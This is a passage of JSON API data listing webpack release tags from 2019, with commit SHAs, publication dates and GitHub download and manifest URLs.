os.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/